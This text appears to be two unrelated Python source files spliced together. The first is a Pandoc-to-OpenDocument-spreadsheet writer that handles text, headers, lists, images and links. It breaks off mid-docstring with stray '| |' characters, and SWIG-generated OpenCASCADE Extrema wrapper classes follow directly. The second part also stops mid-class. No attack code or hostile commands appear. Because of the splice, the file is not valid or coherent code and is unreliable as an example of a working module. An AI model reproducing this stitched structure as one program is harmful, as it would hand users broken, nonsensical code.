parser.add_argument('-r', '--reference', nargs=1, help='Reference to file with styles', action='store')
args = parser.parse_args()
# It is important for auto-height in text-rows:
# if you want to change width by default (10 cm), change it in 'write_sheet()',
# count how much PT in your length (in CM) and change this constant:
PTINTENCM = 284
# count how much IN in your length (in CM) and change this constant:
ININTENCM = 3.9
# I need this global variables, because there are two recursive functions call each other, so it would be very hard work
# without global "string_to_write". Other ones are just make those functions much more easy to read.
ods = OpenDocumentSpreadsheet()
table = Table()  # creating the first sheet
content = P()
string_to_write = ''    # text accumulated for the cell currently being built
header_level = 0        # level of the header being written, 0 = not a header
bullet = 0  # indicating bullet lists
ordered = 0  # indicating bullet list and used as order at item lines
image_counter = 0       # index into saved_hr; -1 means "no images available"
saved_hr = None  # list of hardreferences to loaded images
saved_styles = {}  # We will save styles in order to not downloading it again each time we use it.
separator = 0  # level of separating header
# Dictionary of formatting indicators.
fmt = {'Emph': 0,
       'Strong': 0,
       'Strikeout': 0}
def write_sheet():
    """Attach the current sheet to the document, giving it a single
    10 cm wide text column (the width PTINTENCM/ININTENCM are tuned for)."""
    column_style = Style(name="Wide", family="table-column")
    column_style.addElement(TableColumnProperties(columnwidth="10cm"))
    ods.automaticstyles.addElement(column_style)
    table.addElement(TableColumn(stylename='Wide'))
    ods.spreadsheet.addElement(table)
def count_height(row, cell):
    """Set a row height tall enough to display all text in *cell*.

    Estimates how many characters fit on one line from the fixed column width
    (PTINTENCM) and the cell style's font size, derives the number of wrapped
    lines from the total text length, then registers a matching table-row
    style and assigns it to *row*.

    Args:
        row: current TableRow; its 'stylename' attribute is overwritten.
        cell: current TableCell whose text content drives the height.
    """
    style_name = cell.getAttribute('stylename')
    # Fall back to 10pt when the style is unknown or has no text properties.
    # (Flattened from the original nested try/except KeyError/IndexError.)
    try:
        text_prop = saved_styles[style_name].getElementsByType(TextProperties)[0]
        font_size = str(text_prop.getAttribute('fontsize'))
        font_size = int(font_size.replace('pt', ''))
    except (KeyError, IndexError):
        font_size = 10
    symbols_in_string = PTINTENCM // font_size + 1
    # Total visible text length across all paragraphs in the cell.
    # Fixed: use str(p) instead of calling p.__str__() directly.
    length = sum(len(str(p)) for p in cell.getElementsByType(P))
    height = font_size * (length // symbols_in_string + 1) + 4
    height = str(height) + 'pt'
    new_name = 'heightsuit' + height
    height_suit = Style(name=new_name, family='table-row')
    height_suit.addElement(TableRowProperties(rowheight=height))
    ods.automaticstyles.addElement(height_suit)
    row.setAttribute(attr='stylename', value=new_name)
def count_size(wh_list, row):
    """Compute the display size for an image row.

    Reads 'width'/'height' (inch strings) from the attribute pairs in
    *wh_list*; if either is missing, both default to ININTENCM. Images wider
    than the column are scaled down proportionally. A table-row style with
    the resulting height is registered and assigned to *row*.

    Args:
        wh_list: list of [key, value] attribute pairs, values like '3.2in'.
        row: the image TableRow to restyle.

    Returns:
        (width, height) as inch strings, e.g. ('3.9in', '2.1in').
    """
    height = -1
    width = -1
    for pair in wh_list:
        key, value = pair[0], pair[1]
        if key == 'width':
            width = float(value.replace('in', ''))
        if key == 'height':
            height = float(value.replace('in', ''))
    if height == -1 or width == -1:
        # One (or both) dimensions missing: use the default square size.
        width = ININTENCM
        height = ININTENCM
    if width > ININTENCM:
        # Shrink to column width, preserving the aspect ratio.
        scaled_width = ININTENCM
        scaled_height = height * scaled_width / width
    else:
        scaled_width = width
        scaled_height = height
    height_set = str(scaled_height) + 'in'
    style_name = 'image' + str(image_counter)
    row_style = Style(name=style_name, family='table-row')
    row_style.addElement(TableRowProperties(rowheight=height_set))
    ods.automaticstyles.addElement(row_style)
    row.setAttribute(attr='stylename', value=style_name)
    return str(scaled_width) + 'in', height_set
def add_style(cell, name):
    """Assign style *name* to *cell*, loading and caching it on first use.

    Loads the style from the reference file (``-r`` option) or, by default,
    from 'styles.ods' next to this script, via lstyle.load_style. Loaded
    styles are memoised in `saved_styles` so each style is fetched only once.

    Args:
        cell: cell that needs to be styled.
        name: style name that will be set.
    """
    if args.reference:
        styles_source = args.reference[0]
    else:
        # Default reference: 'styles.ods' in the same directory as the script.
        styles_source = str(sys.argv[0]).replace('odswriter.py', '') + 'styles.ods'
    # Fixed: plain membership test instead of a discarded saved_styles[name]
    # lookup wrapped in try/except KeyError. (The previous `global` statements
    # were no-ops: the dict and document are only mutated, never rebound.)
    if name not in saved_styles:
        style = load_style(name, styles_source)
        if style is not None:
            saved_styles[name] = style
            ods.styles.addElement(style)
    cell.setAttribute(attr='stylename', value=name)
def write_text():
    """Flush the accumulated text into its own cell of the output file.

    Called every time a whole paragraph or block of elements has been
    collected in `string_to_write`. Headers get their level style (new style
    names are generated on the fly for levels beyond 2) and, when the level
    matches the `-s` separator option, start a new sheet named after the
    header text. Bullet/ordered items get their '- ' / 'N) ' prefix. After
    writing, the current row is advanced and `string_to_write` is cleared.
    """
    global string_to_write
    global header_level
    global ordered
    global bullet
    global table
    global separator
    global content
    row = TableRow()
    cell = TableCell()
    # Fixed: the original tested `header_level != 0 and header_level > 0`;
    # the first clause was redundant.
    if header_level > 0:
        if header_level > (len(header) - 1):  # headers deeper than the presets
            for i in range(len(header), header_level + 1):
                header.append('header' + str(i))
        add_style(cell, header[header_level])
        if header_level == separator:  # separator set: start a new sheet here
            if table.hasChildNodes():
                write_sheet()
            table = Table(name=string_to_write)  # new sheet named after the header
    else:
        add_style(cell, simple_text)
    if bullet:
        string_to_write = '- ' + string_to_write
    if ordered > 0:
        string_to_write = str(ordered) + ') ' + string_to_write
        ordered = ordered + 1
    content.addText(string_to_write)
    cell.addElement(content)
    content = P()
    count_height(row, cell)
    row.addElement(cell)
    table.addElement(row)
    string_to_write = ''
def write_image(image):
    """Write to output file image elements.
    Since, element with title 'Image' has special structure of 'c'(Content) field, that looks like:
    [[0], [1], [2]]
    where:
    [0] - list of attributes: identifier, classes, key-value pairs:
        ['id', [], [ ... , ['weight', '...in'], ['height', '...in'], ... ] - we get sizes there.
    [1] - caption.
    [2] - ['src', 'title'] - source and title of image.
    we should parse it especially.
    Args:
        image - element with title 'Image'.

    Notes:
        image_counter doubles as state: 0 = images not loaded yet, -1 = no
        images available (all image elements are then skipped), otherwise it
        is the index of the next entry in saved_hr.
        NOTE(review): assumes load_images returns hrefs in the same order the
        images appear in the document -- confirm in pandocodswriter.limages.
    """
    global image_counter
    global saved_hr
    if image_counter == -1:
        # A previous call found no images; nothing to do.
        return
    if image_counter == 0:
        # First image element: load all images into the document once.
        saved_hr = load_images(args.input, ods)
        if len(saved_hr) == 0:
            image_counter = -1
            return
    if string_to_write:
        # Flush any pending text so the image lands in its own row.
        write_text()
    row = TableRow()
    cell = TableCell()
    w, h = count_size(image['c'][0][2], row)
    frame = Frame(width=w, height=h)
    img = Image(href=saved_hr[image_counter])
    table.addElement(row)
    row.addElement(cell)
    cell.addElement(frame)
    frame.addElement(img)
    image_counter = image_counter + 1
def write_bullet(bull_list, without_write):
    """Write a bullet list by toggling the module-level `bullet` flag around
    the parse of the list's content; while it is set, write_text() prefixes
    each item with '- '.

    Args:
        bull_list - presumably the Pandoc 'BulletList' element; its 'c' field
            holds the list items.
        without_write - passed through to list_parse unchanged.
    """
    global bullet
    bullet = 1
    list_parse(bull_list['c'], without_write)
    bullet = 0
def write_ord(ord_list, without_write):
    """Write an ordered list: `ordered` starts at 1 and write_text() both
    prefixes each item with 'N) ' and increments the counter. Reset to 0
    afterwards so following text is not numbered.

    Args:
        ord_list - presumably the Pandoc 'OrderedList' element; its 'c' field
            holds the list items.
        without_write - passed through to list_parse unchanged.
    """
    global ordered
    ordered = 1
    list_parse(ord_list['c'], without_write)
    ordered = 0
def write_code(code):
    """Append a code element's text to the pending cell text.

    Elements titled 'Code' or 'CodeBlock' carry a content field shaped
    [[attrs], 'code'] where [attrs] lists identifier, classes and key-value
    pairs, and 'code' is the literal code string -- only the string part is
    written.

    Args:
        code - element with title 'Code' or 'CodeBlock'.
    """
    global string_to_write
    string_to_write += code['c'][1]
def write_link(link):
    """Emit a hyperlink element into the current paragraph.

    A 'Link' element's content field is shaped [[attrs], [text], [target,
    title]]: [attrs] holds identifier/classes/key-value pairs, [text] is the
    list of inline objects forming the visible label, and target/title are
    the URL and its title. Pending plain text is flushed first, then the
    label is collected (parse-only pass) and added as an A element.

    Args:
        link - element with title 'Link'.
    """
    global string_to_write
    global content
    # Flush any text gathered before the link into the paragraph.
    content.addText(string_to_write)
    string_to_write = ''
    # Parse-only pass: collects the link's visible text into string_to_write.
    list_parse(link['c'][1], without_write=True)
    hyperlink = A(href=link['c'][2][0], text=string_to_write)
    string_to_write = ''
    content.addElement(hyperlink)
def write_math(math):
    """Append a TeX math element's source text to the pending cell text.

    A 'Math' element's content field is shaped [{type}, 'math'] where {type}
    is a dictionary describing the kind of math and 'math' is the TeX source
    string; only the string part is written for now.

    Args:
        math - element with title 'Math'.
    """
    # TODO: render the math instead of emitting raw TeX source.
    global string_to_write
    string_to_write += math['c'][1]
def write_raw(raw):
    """Append a raw element's text to the pending cell text.

    Elements titled 'RawBlock' or 'RawInline' carry a content field shaped
    [format, 'raw text'] where format names the raw text's format; only the
    text part is written.

    Args:
        raw - element with title 'RawBlock' or 'RawInline'.
    """
    global string_to_write
    string_to_write += raw['c'][1]
def write_special_block(block, without_write):
"""Write special | |
lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_Extrema.Handle_Extrema_LCCacheOfLocateExtCC_swiginit(self,_Extrema.new_Handle_Extrema_LCCacheOfLocateExtCC(*args))
# register the handle in the base object
if len(args) > 0:
register_handle(self, args[0])
DownCast = staticmethod(_Extrema.Handle_Extrema_LCCacheOfLocateExtCC_DownCast)
__swig_destroy__ = _Extrema.delete_Handle_Extrema_LCCacheOfLocateExtCC
# SWIG-generated registration boilerplate (swiginit/new_instancemethod/
# swigregister pattern): binds the C-level implementations onto the proxy
# class and registers it with the _Extrema extension module.
Handle_Extrema_LCCacheOfLocateExtCC.Nullify = new_instancemethod(_Extrema.Handle_Extrema_LCCacheOfLocateExtCC_Nullify,None,Handle_Extrema_LCCacheOfLocateExtCC)
Handle_Extrema_LCCacheOfLocateExtCC.IsNull = new_instancemethod(_Extrema.Handle_Extrema_LCCacheOfLocateExtCC_IsNull,None,Handle_Extrema_LCCacheOfLocateExtCC)
Handle_Extrema_LCCacheOfLocateExtCC.GetObject = new_instancemethod(_Extrema.Handle_Extrema_LCCacheOfLocateExtCC_GetObject,None,Handle_Extrema_LCCacheOfLocateExtCC)
Handle_Extrema_LCCacheOfLocateExtCC_swigregister = _Extrema.Handle_Extrema_LCCacheOfLocateExtCC_swigregister
Handle_Extrema_LCCacheOfLocateExtCC_swigregister(Handle_Extrema_LCCacheOfLocateExtCC)
# NOTE(review): the def below is immediately shadowed by the rebinding on the
# following line, so the Python wrapper is dead code -- the C function is
# exposed directly. This is standard SWIG output; left untouched.
def Handle_Extrema_LCCacheOfLocateExtCC_DownCast(*args):
  return _Extrema.Handle_Extrema_LCCacheOfLocateExtCC_DownCast(*args)
Handle_Extrema_LCCacheOfLocateExtCC_DownCast = _Extrema.Handle_Extrema_LCCacheOfLocateExtCC_DownCast
# SWIG-generated proxy (swiginit/new_instancemethod/swigregister pattern)
# wrapping the C++ Extrema_LocECC2dOfLocateExtCC2d class: local extrema
# search between two 2D curves from a starting parameter pair.
class Extrema_LocECC2dOfLocateExtCC2d(object):
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :param C1:
        :type C1: Adaptor2d_Curve2d &
        :param C2:
        :type C2: Adaptor2d_Curve2d &
        :param U0:
        :type U0: float
        :param V0:
        :type V0: float
        :param TolU:
        :type TolU: float
        :param TolV:
        :type TolV: float
        :rtype: None
        """
        _Extrema.Extrema_LocECC2dOfLocateExtCC2d_swiginit(self,_Extrema.new_Extrema_LocECC2dOfLocateExtCC2d(*args))
    def IsDone(self, *args):
        """
        :rtype: bool
        """
        return _Extrema.Extrema_LocECC2dOfLocateExtCC2d_IsDone(self, *args)
    def SquareDistance(self, *args):
        """
        :rtype: float
        """
        return _Extrema.Extrema_LocECC2dOfLocateExtCC2d_SquareDistance(self, *args)
    def Point(self, *args):
        """
        :param P1:
        :type P1: Extrema_POnCurv2d &
        :param P2:
        :type P2: Extrema_POnCurv2d &
        :rtype: None
        """
        return _Extrema.Extrema_LocECC2dOfLocateExtCC2d_Point(self, *args)
    __swig_destroy__ = _Extrema.delete_Extrema_LocECC2dOfLocateExtCC2d
# Bind C-level implementations as instance methods and register the proxy.
Extrema_LocECC2dOfLocateExtCC2d.IsDone = new_instancemethod(_Extrema.Extrema_LocECC2dOfLocateExtCC2d_IsDone,None,Extrema_LocECC2dOfLocateExtCC2d)
Extrema_LocECC2dOfLocateExtCC2d.SquareDistance = new_instancemethod(_Extrema.Extrema_LocECC2dOfLocateExtCC2d_SquareDistance,None,Extrema_LocECC2dOfLocateExtCC2d)
Extrema_LocECC2dOfLocateExtCC2d.Point = new_instancemethod(_Extrema.Extrema_LocECC2dOfLocateExtCC2d_Point,None,Extrema_LocECC2dOfLocateExtCC2d)
Extrema_LocECC2dOfLocateExtCC2d_swigregister = _Extrema.Extrema_LocECC2dOfLocateExtCC2d_swigregister
Extrema_LocECC2dOfLocateExtCC2d_swigregister(Extrema_LocECC2dOfLocateExtCC2d)
# SWIG-generated proxy: 3D counterpart of Extrema_LocECC2dOfLocateExtCC2d
# (local extrema search between two 3D curves).
class Extrema_LocECCOfLocateExtCC(object):
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :param C1:
        :type C1: Adaptor3d_Curve &
        :param C2:
        :type C2: Adaptor3d_Curve &
        :param U0:
        :type U0: float
        :param V0:
        :type V0: float
        :param TolU:
        :type TolU: float
        :param TolV:
        :type TolV: float
        :rtype: None
        """
        _Extrema.Extrema_LocECCOfLocateExtCC_swiginit(self,_Extrema.new_Extrema_LocECCOfLocateExtCC(*args))
    def IsDone(self, *args):
        """
        :rtype: bool
        """
        return _Extrema.Extrema_LocECCOfLocateExtCC_IsDone(self, *args)
    def SquareDistance(self, *args):
        """
        :rtype: float
        """
        return _Extrema.Extrema_LocECCOfLocateExtCC_SquareDistance(self, *args)
    def Point(self, *args):
        """
        :param P1:
        :type P1: Extrema_POnCurv &
        :param P2:
        :type P2: Extrema_POnCurv &
        :rtype: None
        """
        return _Extrema.Extrema_LocECCOfLocateExtCC_Point(self, *args)
    __swig_destroy__ = _Extrema.delete_Extrema_LocECCOfLocateExtCC
# Bind C-level implementations as instance methods and register the proxy.
Extrema_LocECCOfLocateExtCC.IsDone = new_instancemethod(_Extrema.Extrema_LocECCOfLocateExtCC_IsDone,None,Extrema_LocECCOfLocateExtCC)
Extrema_LocECCOfLocateExtCC.SquareDistance = new_instancemethod(_Extrema.Extrema_LocECCOfLocateExtCC_SquareDistance,None,Extrema_LocECCOfLocateExtCC)
Extrema_LocECCOfLocateExtCC.Point = new_instancemethod(_Extrema.Extrema_LocECCOfLocateExtCC_Point,None,Extrema_LocECCOfLocateExtCC)
Extrema_LocECCOfLocateExtCC_swigregister = _Extrema.Extrema_LocECCOfLocateExtCC_swigregister
Extrema_LocECCOfLocateExtCC_swigregister(Extrema_LocECCOfLocateExtCC)
# SWIG-generated proxy: local extrema of distance between a 3D point and a
# 3D curve from a starting parameter. The __init__ docstring lists the
# multiple C++ constructor overloads dispatched through *args.
class Extrema_LocEPCOfLocateExtPC(object):
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        :param P:
        :type P: gp_Pnt
        :param C:
        :type C: Adaptor3d_Curve &
        :param U0:
        :type U0: float
        :param TolU:
        :type TolU: float
        :rtype: None
        :param P:
        :type P: gp_Pnt
        :param C:
        :type C: Adaptor3d_Curve &
        :param U0:
        :type U0: float
        :param Umin:
        :type Umin: float
        :param Usup:
        :type Usup: float
        :param TolU:
        :type TolU: float
        :rtype: None
        """
        _Extrema.Extrema_LocEPCOfLocateExtPC_swiginit(self,_Extrema.new_Extrema_LocEPCOfLocateExtPC(*args))
    def Initialize(self, *args):
        """
        :param C:
        :type C: Adaptor3d_Curve &
        :param Umin:
        :type Umin: float
        :param Usup:
        :type Usup: float
        :param TolU:
        :type TolU: float
        :rtype: None
        """
        return _Extrema.Extrema_LocEPCOfLocateExtPC_Initialize(self, *args)
    def Perform(self, *args):
        """
        :param P:
        :type P: gp_Pnt
        :param U0:
        :type U0: float
        :rtype: None
        """
        return _Extrema.Extrema_LocEPCOfLocateExtPC_Perform(self, *args)
    def IsDone(self, *args):
        """
        :rtype: bool
        """
        return _Extrema.Extrema_LocEPCOfLocateExtPC_IsDone(self, *args)
    def SquareDistance(self, *args):
        """
        :rtype: float
        """
        return _Extrema.Extrema_LocEPCOfLocateExtPC_SquareDistance(self, *args)
    def IsMin(self, *args):
        """
        :rtype: bool
        """
        return _Extrema.Extrema_LocEPCOfLocateExtPC_IsMin(self, *args)
    def Point(self, *args):
        """
        :rtype: Extrema_POnCurv
        """
        return _Extrema.Extrema_LocEPCOfLocateExtPC_Point(self, *args)
    __swig_destroy__ = _Extrema.delete_Extrema_LocEPCOfLocateExtPC
# Bind C-level implementations as instance methods and register the proxy.
Extrema_LocEPCOfLocateExtPC.Initialize = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC_Initialize,None,Extrema_LocEPCOfLocateExtPC)
Extrema_LocEPCOfLocateExtPC.Perform = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC_Perform,None,Extrema_LocEPCOfLocateExtPC)
Extrema_LocEPCOfLocateExtPC.IsDone = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC_IsDone,None,Extrema_LocEPCOfLocateExtPC)
Extrema_LocEPCOfLocateExtPC.SquareDistance = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC_SquareDistance,None,Extrema_LocEPCOfLocateExtPC)
Extrema_LocEPCOfLocateExtPC.IsMin = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC_IsMin,None,Extrema_LocEPCOfLocateExtPC)
Extrema_LocEPCOfLocateExtPC.Point = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC_Point,None,Extrema_LocEPCOfLocateExtPC)
Extrema_LocEPCOfLocateExtPC_swigregister = _Extrema.Extrema_LocEPCOfLocateExtPC_swigregister
Extrema_LocEPCOfLocateExtPC_swigregister(Extrema_LocEPCOfLocateExtPC)
# SWIG-generated proxy: 2D counterpart of Extrema_LocEPCOfLocateExtPC
# (local extrema of distance between a 2D point and a 2D curve).
class Extrema_LocEPCOfLocateExtPC2d(object):
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        :param P:
        :type P: gp_Pnt2d
        :param C:
        :type C: Adaptor2d_Curve2d &
        :param U0:
        :type U0: float
        :param TolU:
        :type TolU: float
        :rtype: None
        :param P:
        :type P: gp_Pnt2d
        :param C:
        :type C: Adaptor2d_Curve2d &
        :param U0:
        :type U0: float
        :param Umin:
        :type Umin: float
        :param Usup:
        :type Usup: float
        :param TolU:
        :type TolU: float
        :rtype: None
        """
        _Extrema.Extrema_LocEPCOfLocateExtPC2d_swiginit(self,_Extrema.new_Extrema_LocEPCOfLocateExtPC2d(*args))
    def Initialize(self, *args):
        """
        :param C:
        :type C: Adaptor2d_Curve2d &
        :param Umin:
        :type Umin: float
        :param Usup:
        :type Usup: float
        :param TolU:
        :type TolU: float
        :rtype: None
        """
        return _Extrema.Extrema_LocEPCOfLocateExtPC2d_Initialize(self, *args)
    def Perform(self, *args):
        """
        :param P:
        :type P: gp_Pnt2d
        :param U0:
        :type U0: float
        :rtype: None
        """
        return _Extrema.Extrema_LocEPCOfLocateExtPC2d_Perform(self, *args)
    def IsDone(self, *args):
        """
        :rtype: bool
        """
        return _Extrema.Extrema_LocEPCOfLocateExtPC2d_IsDone(self, *args)
    def SquareDistance(self, *args):
        """
        :rtype: float
        """
        return _Extrema.Extrema_LocEPCOfLocateExtPC2d_SquareDistance(self, *args)
    def IsMin(self, *args):
        """
        :rtype: bool
        """
        return _Extrema.Extrema_LocEPCOfLocateExtPC2d_IsMin(self, *args)
    def Point(self, *args):
        """
        :rtype: Extrema_POnCurv2d
        """
        return _Extrema.Extrema_LocEPCOfLocateExtPC2d_Point(self, *args)
    __swig_destroy__ = _Extrema.delete_Extrema_LocEPCOfLocateExtPC2d
# Bind C-level implementations as instance methods and register the proxy.
Extrema_LocEPCOfLocateExtPC2d.Initialize = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC2d_Initialize,None,Extrema_LocEPCOfLocateExtPC2d)
Extrema_LocEPCOfLocateExtPC2d.Perform = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC2d_Perform,None,Extrema_LocEPCOfLocateExtPC2d)
Extrema_LocEPCOfLocateExtPC2d.IsDone = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC2d_IsDone,None,Extrema_LocEPCOfLocateExtPC2d)
Extrema_LocEPCOfLocateExtPC2d.SquareDistance = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC2d_SquareDistance,None,Extrema_LocEPCOfLocateExtPC2d)
Extrema_LocEPCOfLocateExtPC2d.IsMin = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC2d_IsMin,None,Extrema_LocEPCOfLocateExtPC2d)
Extrema_LocEPCOfLocateExtPC2d.Point = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC2d_Point,None,Extrema_LocEPCOfLocateExtPC2d)
Extrema_LocEPCOfLocateExtPC2d_swigregister = _Extrema.Extrema_LocEPCOfLocateExtPC2d_swigregister
Extrema_LocEPCOfLocateExtPC2d_swigregister(Extrema_LocEPCOfLocateExtPC2d)
# SWIG-generated proxy: curve/curve local extrema search (3D), started from
# the parameter pair (U0, V0).
class Extrema_LocateExtCC(object):
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :param C1:
        :type C1: Adaptor3d_Curve &
        :param C2:
        :type C2: Adaptor3d_Curve &
        :param U0:
        :type U0: float
        :param V0:
        :type V0: float
        :rtype: None
        """
        _Extrema.Extrema_LocateExtCC_swiginit(self,_Extrema.new_Extrema_LocateExtCC(*args))
    def IsDone(self, *args):
        """
        :rtype: bool
        """
        return _Extrema.Extrema_LocateExtCC_IsDone(self, *args)
    def SquareDistance(self, *args):
        """
        :rtype: float
        """
        return _Extrema.Extrema_LocateExtCC_SquareDistance(self, *args)
    def Point(self, *args):
        """
        :param P1:
        :type P1: Extrema_POnCurv &
        :param P2:
        :type P2: Extrema_POnCurv &
        :rtype: None
        """
        return _Extrema.Extrema_LocateExtCC_Point(self, *args)
    __swig_destroy__ = _Extrema.delete_Extrema_LocateExtCC
# Bind C-level implementations as instance methods and register the proxy.
Extrema_LocateExtCC.IsDone = new_instancemethod(_Extrema.Extrema_LocateExtCC_IsDone,None,Extrema_LocateExtCC)
Extrema_LocateExtCC.SquareDistance = new_instancemethod(_Extrema.Extrema_LocateExtCC_SquareDistance,None,Extrema_LocateExtCC)
Extrema_LocateExtCC.Point = new_instancemethod(_Extrema.Extrema_LocateExtCC_Point,None,Extrema_LocateExtCC)
Extrema_LocateExtCC_swigregister = _Extrema.Extrema_LocateExtCC_swigregister
Extrema_LocateExtCC_swigregister(Extrema_LocateExtCC)
# SWIG-generated proxy: 2D counterpart of Extrema_LocateExtCC.
class Extrema_LocateExtCC2d(object):
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :param C1:
        :type C1: Adaptor2d_Curve2d &
        :param C2:
        :type C2: Adaptor2d_Curve2d &
        :param U0:
        :type U0: float
        :param V0:
        :type V0: float
        :rtype: None
        """
        _Extrema.Extrema_LocateExtCC2d_swiginit(self,_Extrema.new_Extrema_LocateExtCC2d(*args))
    def IsDone(self, *args):
        """
        :rtype: bool
        """
        return _Extrema.Extrema_LocateExtCC2d_IsDone(self, *args)
    def SquareDistance(self, *args):
        """
        :rtype: float
        """
        return _Extrema.Extrema_LocateExtCC2d_SquareDistance(self, *args)
    def Point(self, *args):
        """
        :param P1:
        :type P1: Extrema_POnCurv2d &
        :param P2:
        :type P2: Extrema_POnCurv2d &
        :rtype: None
        """
        return _Extrema.Extrema_LocateExtCC2d_Point(self, *args)
    __swig_destroy__ = _Extrema.delete_Extrema_LocateExtCC2d
# Bind C-level implementations as instance methods and register the proxy.
Extrema_LocateExtCC2d.IsDone = new_instancemethod(_Extrema.Extrema_LocateExtCC2d_IsDone,None,Extrema_LocateExtCC2d)
Extrema_LocateExtCC2d.SquareDistance = new_instancemethod(_Extrema.Extrema_LocateExtCC2d_SquareDistance,None,Extrema_LocateExtCC2d)
Extrema_LocateExtCC2d.Point = new_instancemethod(_Extrema.Extrema_LocateExtCC2d_Point,None,Extrema_LocateExtCC2d)
Extrema_LocateExtCC2d_swigregister = _Extrema.Extrema_LocateExtCC2d_swigregister
Extrema_LocateExtCC2d_swigregister(Extrema_LocateExtCC2d)
# SWIG-generated proxy: point/curve local extrema search (3D) from a starting
# parameter U0 with function tolerance TolF. The __init__ docstring lists the
# C++ constructor overloads dispatched through *args.
class Extrema_LocateExtPC(object):
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        :param P:
        :type P: gp_Pnt
        :param C:
        :type C: Adaptor3d_Curve &
        :param U0:
        :type U0: float
        :param TolF:
        :type TolF: float
        :rtype: None
        :param P:
        :type P: gp_Pnt
        :param C:
        :type C: Adaptor3d_Curve &
        :param U0:
        :type U0: float
        :param Umin:
        :type Umin: float
        :param Usup:
        :type Usup: float
        :param TolF:
        :type TolF: float
        :rtype: None
        """
        _Extrema.Extrema_LocateExtPC_swiginit(self,_Extrema.new_Extrema_LocateExtPC(*args))
    def Initialize(self, *args):
        """
        :param C:
        :type C: Adaptor3d_Curve &
        :param Umin:
        :type Umin: float
        :param Usup:
        :type Usup: float
        :param TolF:
        :type TolF: float
        :rtype: None
        """
        return _Extrema.Extrema_LocateExtPC_Initialize(self, *args)
    def Perform(self, *args):
        """
        :param P:
        :type P: gp_Pnt
        :param U0:
        :type U0: float
        :rtype: None
        """
        return _Extrema.Extrema_LocateExtPC_Perform(self, *args)
    def IsDone(self, *args):
        """
        :rtype: bool
        """
        return _Extrema.Extrema_LocateExtPC_IsDone(self, *args)
    def SquareDistance(self, *args):
        """
        :rtype: float
        """
        return _Extrema.Extrema_LocateExtPC_SquareDistance(self, *args)
    def IsMin(self, *args):
        """
        :rtype: bool
        """
        return _Extrema.Extrema_LocateExtPC_IsMin(self, *args)
    def Point(self, *args):
        """
        :rtype: Extrema_POnCurv
        """
        return _Extrema.Extrema_LocateExtPC_Point(self, *args)
    __swig_destroy__ = _Extrema.delete_Extrema_LocateExtPC
# Bind C-level implementations as instance methods and register the proxy.
Extrema_LocateExtPC.Initialize = new_instancemethod(_Extrema.Extrema_LocateExtPC_Initialize,None,Extrema_LocateExtPC)
Extrema_LocateExtPC.Perform = new_instancemethod(_Extrema.Extrema_LocateExtPC_Perform,None,Extrema_LocateExtPC)
Extrema_LocateExtPC.IsDone = new_instancemethod(_Extrema.Extrema_LocateExtPC_IsDone,None,Extrema_LocateExtPC)
Extrema_LocateExtPC.SquareDistance = new_instancemethod(_Extrema.Extrema_LocateExtPC_SquareDistance,None,Extrema_LocateExtPC)
Extrema_LocateExtPC.IsMin = new_instancemethod(_Extrema.Extrema_LocateExtPC_IsMin,None,Extrema_LocateExtPC)
Extrema_LocateExtPC.Point = new_instancemethod(_Extrema.Extrema_LocateExtPC_Point,None,Extrema_LocateExtPC)
Extrema_LocateExtPC_swigregister = _Extrema.Extrema_LocateExtPC_swigregister
Extrema_LocateExtPC_swigregister(Extrema_LocateExtPC)
# SWIG-generated proxy: 2D counterpart of Extrema_LocateExtPC.
class Extrema_LocateExtPC2d(object):
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        :param P:
        :type P: gp_Pnt2d
        :param C:
        :type C: Adaptor2d_Curve2d &
        :param U0:
        :type U0: float
        :param TolF:
        :type TolF: float
        :rtype: None
        :param P:
        :type P: gp_Pnt2d
        :param C:
        :type C: Adaptor2d_Curve2d &
        :param U0:
        :type U0: float
        :param Umin:
        :type Umin: float
        :param Usup:
        :type Usup: float
        :param TolF:
        :type TolF: float
        :rtype: None
        """
        _Extrema.Extrema_LocateExtPC2d_swiginit(self,_Extrema.new_Extrema_LocateExtPC2d(*args))
    def Initialize(self, *args):
        """
        :param C:
        :type C: Adaptor2d_Curve2d &
        :param Umin:
        :type Umin: float
        :param Usup:
        :type Usup: float
        :param TolF:
        :type TolF: float
        :rtype: None
        """
        return _Extrema.Extrema_LocateExtPC2d_Initialize(self, *args)
    def Perform(self, *args):
        """
        :param P:
        :type P: gp_Pnt2d
        :param U0:
        :type U0: float
        :rtype: None
        """
        return _Extrema.Extrema_LocateExtPC2d_Perform(self, *args)
    def IsDone(self, *args):
        """
        :rtype: bool
        """
        return _Extrema.Extrema_LocateExtPC2d_IsDone(self, *args)
    def SquareDistance(self, *args):
        """
        :rtype: float
        """
